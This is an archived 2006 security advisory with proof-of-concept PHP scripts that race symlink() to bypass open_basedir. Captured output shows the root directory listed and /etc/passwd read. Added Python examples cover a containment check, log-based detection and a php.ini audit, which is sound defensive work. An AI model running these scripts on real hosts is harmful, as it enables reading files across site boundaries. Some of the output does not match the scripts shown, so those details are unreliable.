nst-php-openbasedir.txt

09 Oct 2006 - Reported by Paisterist - Source: packetstorm (packetstormsecurity.com)

PHP open_basedir symlink() function Race Condition PoC exploit

Code
/*  
--------------------------------------------------------  
[N]eo [S]ecurity [T]eam [NST] - Advisory #26 - 09/10/06  
--------------------------------------------------------  
Program: PHP  
Homepage: http://www.php.net  
Vulnerable Versions: PHP 3, 4, 5  
Risk: High!  
Impact: Critical Risk  
  
-==PHP open_basedir with symlink() function Race Condition PoC exploit==-  
---------------------------------------------------------  
  
- Description  
---------------------------------------------------------  
PHP is a widely-used general-purpose scripting language that is especially  
suited for Web development and can be embedded into HTML.  
  
- Tested  
---------------------------------------------------------  
localhost - PHP 5.0.4  
  
- Vulnerability Description  
---------------------------------------------------------  
  
The vulnerability was discovered by the staff of Hardened-PHP (www.hardened-php.net).
You can read the original advisory at http://www.hardened-php.net/advisory_082006.132.html.
  
The point is not quite what the Hardened-PHP people said:
  
"The first script alternates a symbolic link between a file that  
is allowed and the one that is forbidden by open_basedir and the  
second script simply puts loops around operations trying to  
operate on the symbolic link."  
  
We do not need to alternate the symlink between an allowed file and a
forbidden one. In this PoC you can see that the symlink never points to
an allowed file inside the loop: the race is only between the moment
open_basedir resolves the path and the moment the operation uses it.
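The race described above is a check-then-use problem: open_basedir validates a path string, and a moment later the operation dereferences a symlink that may now resolve elsewhere. The defensive counterpart is to decide on the object that was actually opened, not on the path. The following Python example is added here and is not part of the NST advisory or of PHP: it opens the file first, asks the kernel (via /proc/self/fd on Linux) where the descriptor really points, and only then checks containment in the base directory; where /proc is absent it falls back to comparing the held inode with a fresh resolution and fails closed on any mismatch. The directory layout in demo() is constructed for the example.

```python
import os
import shutil
import tempfile


def canonical_path_of_fd(fd: int, path_hint: str) -> str:
    """Return where `fd` really points.

    On Linux, /proc/self/fd/<n> is the kernel's own answer for the open
    descriptor, independent of what any symlink on the way looked like before
    or after open(). The fallback (assumption: no /proc) resolves the path
    again and insists it is the same inode we already hold; a mismatch means
    the path changed under us and is treated as an escape attempt.
    """
    try:
        return os.readlink(f"/proc/self/fd/{fd}")
    except OSError:
        resolved = os.path.realpath(path_hint)
        st_fd, st_path = os.fstat(fd), os.stat(resolved)
        if (st_fd.st_dev, st_fd.st_ino) != (st_path.st_dev, st_path.st_ino):
            raise PermissionError("path changed between open() and verification")
        return resolved


def open_within(base: str, user_path: str) -> int:
    """Open `user_path` relative to `base` and return the descriptor only if
    the object that was opened lies inside `base`; otherwise raise
    PermissionError. Because the check runs on the open descriptor, retargeting
    a symlink between check and use cannot change what gets read."""
    base_real = os.path.realpath(base)
    full = os.path.join(base_real, user_path)
    fd = os.open(full, os.O_RDONLY)
    try:
        opened = canonical_path_of_fd(fd, full)
        if os.path.commonpath([base_real, opened]) != base_real:
            raise PermissionError(f"{user_path} resolved to {opened}, outside {base_real}")
        return fd
    except BaseException:
        os.close(fd)
        raise


def read_within(base: str, user_path: str) -> bytes:
    """Read a file through open_within(); the same descriptor that passed the
    containment check is the one the bytes come from."""
    fd = open_within(base, user_path)
    try:
        return os.read(fd, 65536)
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed layout: <root>/vhost is the allowed base, <root>/outside.txt
    stands in for /etc/passwd, and vhost/xxx -> ../outside.txt plays the role
    of the advisory's "xxx" link."""
    root = tempfile.mkdtemp()
    try:
        base = os.path.join(root, "vhost")
        os.mkdir(base)
        with open(os.path.join(base, "inside.txt"), "wb") as f:
            f.write(b"allowed content")
        with open(os.path.join(root, "outside.txt"), "wb") as f:
            f.write(b"root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
        os.symlink("../outside.txt", os.path.join(base, "xxx"))

        results = {"inside": read_within(base, "inside.txt")}
        try:
            read_within(base, "xxx")
            results["escape"] = "allowed"
        except PermissionError:
            results["escape"] = "blocked"
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

Note that this protects the single open: a web application still has to read through the descriptor it verified rather than re-opening the path later, or the same window reappears.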
  
script1.php
<?php
// "dummy" starts as a link into a deep (non-existent) directory chain, so that
// "xxx" = dummy/../../../../../../ resolves to / whenever "dummy" points to "."
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../", "xxx");
unlink("dummy");
// Re-create and remove "dummy" as fast as possible; the other script races this
while (1) {
    symlink(".", "dummy");
    unlink("dummy");
}
?>

script2.php
<?php
// open_basedir does not let us list the root directory directly
@print_r(scandir("/"));
// scandir() is a PHP 5 function; on other versions use another directory function
while (1) {
    $dir = @scandir("xxx");
    // the root directory has more than 20 entries, so a long listing means
    // the "xxx" link resolved to / this time round
    if (@count($dir) > 20) print_r($dir);
}
?>
  
--Real Proof of Concept exploit--  
[root@fc43035 race_condition]# php script1.php &  
[1] 7942  
PHP Warning: Module 'gd' already loaded in Unknown on line 0  
[root@fc43035 race_condition]# php script2.php  
PHP Warning: Module 'gd' already loaded in Unknown on line 0  
PHP Warning: file_get_contents(): open_basedir restriction in effect.  
File(/etc/passwd) is not within the allowed path(s):  
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php  
on line 2  
  
Warning: file_get_contents(): open_basedir restriction in effect.  
File(/etc/passwd) is not within the allowed path(s):  
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php  
on line 2  
PHP Warning: file_get_contents(/etc/passwd): failed to open stream:  
Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on  
line 2  
  
Warning: file_get_contents(/etc/passwd): failed to open stream: Operation  
not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2  
PHP Warning: scandir(): open_basedir restriction in effect. File(/) is not  
within the allowed path(s): (/var/www/vhosts/:/tmp/) in  
/var/www/vhosts/foo/race_condition/script2.php on line 3  
  
Warning: scandir(): open_basedir restriction in effect. File(/) is not  
within the allowed path(s): (/var/www/vhosts/:/tmp/) in  
/var/www/vhosts/foo/race_condition/script2.php on line 3  
PHP Warning: scandir(/): failed to open dir: Operation not permitted in  
/var/www/vhosts/foo/race_condition/script2.php on line 3  
  
Warning: scandir(/): failed to open dir: Operation not permitted in  
/var/www/vhosts/foo/race_condition/script2.php on line 3  
PHP Warning: scandir(): (errno 1): Operation not permitted in  
/var/www/vhosts/foo/race_condition/script2.php on line 3  
  
Warning: scandir(): (errno 1): Operation not permitted in  
/var/www/vhosts/foo/race_condition/script2.php on line 3  
Array  
(  
[0] => .  
[1] => ..  
[2] => .autofsck  
[3] => .autorelabel  
[4] => bin  
[5] => boot  
[6] => chroot  
[7] => dev  
[8] => etc  
[9] => home  
[10] => lib  
[11] => lib64  
[12] => lost+found  
[13] => media  
[14] => misc  
[15] => mnt  
[16] => net  
[17] => opt  
[18] => proc  
[19] => root  
[20] => sbin  
[21] => selinux  
[22] => srv  
[23] => sys  
[24] => tmp  
[25] => usr  
[26] => var  
)  
Array  
(  
[0] => .  
[1] => ..  
[2] => .autofsck  
[3] => .autorelabel  
[4] => bin  
[5] => boot  
[6] => chroot  
[7] => dev  
[8] => etc  
[9] => home  
[10] => lib  
[11] => lib64  
[12] => lost+found  
[13] => media  
[14] => misc  
[15] => mnt  
[16] => net  
[17] => opt  
[18] => proc  
[19] => root  
[20] => sbin  
[21] => selinux  
[22] => srv  
[23] => sys  
[24] => tmp  
[25] => usr  
[26] => var  
)  
  
[root@fc43035 race_condition]#  
--Real Proof of Concept exploit--  
  
We finally bypass the open_basedir restriction and read the root directory's
content. We can also read a file, like /etc/passwd.
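The warnings in the output above are the trace this technique leaves behind: a single script emitting a burst of open_basedir warnings for paths it should never need, with no pause between attempts. The following Python example is added here and is not part of the NST advisory: it parses lines in the format PHP writes to its error_log (the bracketed timestamp prefix is the standard error_log form; the sample lines are constructed from the warnings shown on this page) and flags any script that accumulates more than a threshold of open_basedir denials inside a short window. The threshold and window values are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches PHP's error_log line for an open_basedir denial (timestamp prefix as
# written when log_errors goes to a file).
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] PHP Warning:\s+(?P<func>\w+)\(\): open_basedir restriction in effect\. "
    r"File\((?P<target>[^)]*)\) is not within the allowed path\(s\): \((?P<allowed>[^)]*)\) "
    r"in (?P<script>\S+) on line (?P<line>\d+)$"
)


def parse_line(line: str):
    """Return a dict for an open_basedir denial line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d-%b-%Y %H:%M:%S")
    ev["line"] = int(ev["line"])
    return ev


def find_bursts(lines, threshold: int = 5, window=timedelta(seconds=10)):
    """Group denials per script and report the densest window per script that
    reaches `threshold` events; a normal application rarely hits open_basedir
    at all, and never in a tight loop against the same forbidden targets."""
    per_script = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            per_script[ev["script"]].append(ev)

    findings = []
    for script, evs in per_script.items():
        evs.sort(key=lambda e: e["ts"])
        best = (0, 0, 0)  # (count, start, end)
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count > best[0]:
                best = (count, start, end)
        count, start, end = best
        if count >= threshold:
            span = evs[start:end + 1]
            findings.append({
                "script": script,
                "count": count,
                "targets": sorted({e["target"] for e in span}),
                "first": span[0]["ts"],
                "last": span[-1]["ts"],
            })
    return findings


def _denial(ts, func, target, script, line):
    """Build one constructed log line in PHP's error_log format."""
    return (f"[{ts}] PHP Warning:  {func}(): open_basedir restriction in effect. "
            f"File({target}) is not within the allowed path(s): (/var/www/vhosts/:/tmp/) "
            f"in {script} on line {line}")


RACE = "/var/www/vhosts/foo/race_condition/script2.php"
SAMPLE_LOG = [  # constructed sample, modelled on the output shown in the advisory
    "[09-Oct-2006 14:00:00] PHP Warning:  Module 'gd' already loaded in Unknown on line 0",
    _denial("09-Oct-2006 14:00:01", "file_get_contents", "/etc/passwd", RACE, 2),
    "[09-Oct-2006 14:00:01] PHP Warning:  file_get_contents(/etc/passwd): failed to open stream: "
    "Operation not permitted in " + RACE + " on line 2",
    _denial("09-Oct-2006 14:00:01", "scandir", "/", RACE, 3),
    _denial("09-Oct-2006 14:00:02", "file_get_contents", "/etc/passwd", RACE, 2),
    _denial("09-Oct-2006 14:00:02", "scandir", "/", RACE, 3),
    _denial("09-Oct-2006 14:00:03", "file_get_contents", "/etc/passwd", RACE, 2),
    _denial("09-Oct-2006 14:00:03", "scandir", "/", RACE, 3),
    # one isolated denial from another script: a misconfiguration, not a burst
    _denial("09-Oct-2006 14:05:17", "file_get_contents", "/var/www/other/config.php",
            "/var/www/vhosts/foo/index.php", 40),
]


if __name__ == "__main__":
    for f in find_bursts(SAMPLE_LOG):
        print(f"{f['script']}: {f['count']} denials between {f['first']} and {f['last']} "
              f"for {', '.join(f['targets'])}")
```

Only the "restriction in effect" line is parsed; the accompanying "failed to open stream" line for the same call is ignored so each attempt is counted once.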
  
In the third line of script1.php we make the symbolic link point to
./etc/passwd, so we have to create a folder named "etc" with a
file named "passwd" inside:
  
[root@fc43035 race_condition]# ls  
a etc script1.php script2.php script.php  
[root@fc43035 race_condition]# cd etc  
[root@fc43035 etc]# ls  
passwd  
[root@fc43035 etc]# cd ..  
[root@fc43035 race_condition]#  
  
Then script1.php is the same as the first one; we only change the
symbolic link target to "dummy/../../../../../../etc/passwd".
In script2.php we try to read the file (through the "xxx" link) with the
file_get_contents() function.
  
script1.php
<?php
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy/../../../../../../etc/passwd", "xxx");
unlink("dummy");
while (1) {
    symlink(".", "dummy");
    unlink("dummy");
}
?>

script2.php
<?php
while (1) {
    print @file_get_contents("xxx");
}
?>
  
--Real Proof of Concept exploit--  
[root@fc43035 race_condition]# php script1.php &  
[1] 9979  
PHP Warning: Module 'gd' already loaded in Unknown on line 0  
[root@fc43035 race_condition]# php script2.php  
PHP Warning: Module 'gd' already loaded in Unknown on line 0  
PHP Warning: file_get_contents(): open_basedir restriction in effect.  
File(/etc/passwd) is not within the allowed path(s):  
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php  
on line 2  
  
Warning: file_get_contents(): open_basedir restriction in effect.  
File(/etc/passwd) is not within the allowed path(s):  
(/var/www/vhosts/:/tmp/) in /var/www/vhosts/foo/race_condition/script2.php  
on line 2  
PHP Warning: file_get_contents(/etc/passwd): failed to open stream:  
Operation not permitted in /var/www/vhosts/foo/race_condition/script2.php on  
line 2  
  
Warning: file_get_contents(/etc/passwd): failed to open stream: Operation  
not permitted in /var/www/vhosts/foo/race_condition/script2.php on line 2  
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
news:x:9:13:news:/etc/news:  
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin  
rpm:x:37:37::/var/lib/rpm:/sbin/nologin  
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin  
pcap:x:77:77::/var/arpwatch:/sbin/nologin  
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin  
named:x:25:25:Named:/var/named:/sbin/nologin  
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin  
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin  
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin  
nfsnobody:x:4294967294:4294967294:Anonymous NFS  
User:/var/lib/nfs:/sbin/nologin  
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin  
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin  
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin  
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash  
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash  
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash  
ntp:x:38:38::/etc/ntp:/sbin/nologin  
ftp:x:22222:0:root:/root:/bin/false  
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
news:x:9:13:news:/etc/news:  
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin  
rpm:x:37:37::/var/lib/rpm:/sbin/nologin  
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin  
pcap:x:77:77::/var/arpwatch:/sbin/nologin  
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin  
named:x:25:25:Named:/var/named:/sbin/nologin  
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin  
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin  
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin  
nfsnobody:x:4294967294:4294967294:Anonymous NFS  
User:/var/lib/nfs:/sbin/nologin  
apache:x:48:48:Apache:/var/wwww/htdocs:/sbin/nologin  
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin  
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin  
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash  
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash  
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash  
ntp:x:38:38::/etc/ntp:/sbin/nologin  
ftp:x:22222:0:root:/root:/bin/false  
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash  
  
--Real Proof of Concept exploit--  
  
You can see that /etc/passwd is read twice here, and it would be read many
more times if we did not stop the script.
  
- How to fix it? More information?  
--------------------------------------------------------  
As the Hardened-PHP staff said, you have to disallow the use of the symlink()
function.
You can do this with the disable_functions directive in your PHP
configuration (php.ini by default):
  
disable_functions = ...,symlink;  
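A practitioner rolling this fix out across many hosts wants to verify it landed. The following Python example is added here and is not part of the NST advisory or of PHP: a deliberately small php.ini reader (an assumption: it handles only `key = value` lines, `[section]` headers and `;` comments, not the full PHP ini scanner) that checks whether symlink() is disabled and whether open_basedir is set at all. It also shows why the trailing `;` in the directive above is harmless: in php.ini a semicolon starts a comment, so `symlink;` is read as `symlink`. The two ini texts are constructed for the example.

```python
def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: ';' outside double quotes starts a comment,
    '[section]' lines are skipped, and 'key = value' pairs are collected with
    the key lower-cased and surrounding quotes stripped from the value."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("["):
            continue
        kept, in_quotes = [], False
        for ch in line:
            if ch == '"':
                in_quotes = not in_quotes
            if ch == ";" and not in_quotes:
                break  # rest of the line is a comment
            kept.append(ch)
        line = "".join(kept).strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def disabled_functions(settings: dict) -> set:
    """Split the comma-separated disable_functions value into a set of names."""
    raw = settings.get("disable_functions", "")
    return {name.strip().lower() for name in raw.split(",") if name.strip()}


def audit(text: str) -> list:
    """Return a list of findings; an empty list means both checks passed."""
    settings = parse_php_ini(text)
    findings = []
    if "symlink" not in disabled_functions(settings):
        findings.append("symlink() is callable: disable_functions does not list it")
    if not settings.get("open_basedir"):
        findings.append("open_basedir is not set")
    return findings


# Constructed sample configurations.
WEAK_INI = """
[PHP]
open_basedir = "/var/www/vhosts/:/tmp/"
disable_functions =
"""

HARDENED_INI = """
[PHP]
open_basedir = "/var/www/vhosts/:/tmp/"
disable_functions = exec,passthru,symlink ; symlink() removed as the advisory recommends
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini) or "ok")
```

Disabling symlink() only closes this particular race; open_basedir remains a best-effort boundary and is no substitute for running each site under its own user with filesystem permissions that enforce the separation.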
  
- References  
--------------------------------------------------------  
http://www.neosecurityteam.net/index.php?action=advisories&id=26  
http://www.hardened-php.net/advisory_082006.132.html  
  
- Credits  
--------------------------------------------------------  
Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com
Vulnerability discovered by Hardened-PHP staff (http://www.hardened-php.net)  
  
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/  
  
  
- Greets  
--------------------------------------------------------  
HaCkZaTaN  
K4P0  
Daemon21  
Link  
0m3gA_x  
LINUX  
nitrous  
m0rpheus  
nikyt0x  
KingMetal  
  
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!  
  
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@  
'@@@@@''@@'@@@''''''''@@''@@@''@@  
'@@'@@@@@@''@@@@@@ @@@'''''@@@  
'@@'''@@@@'''''''''@@@''''@@@  
@@@@''''@@'@@@@@@@@@@''''@@@@@  
  
/* EOF */  
  
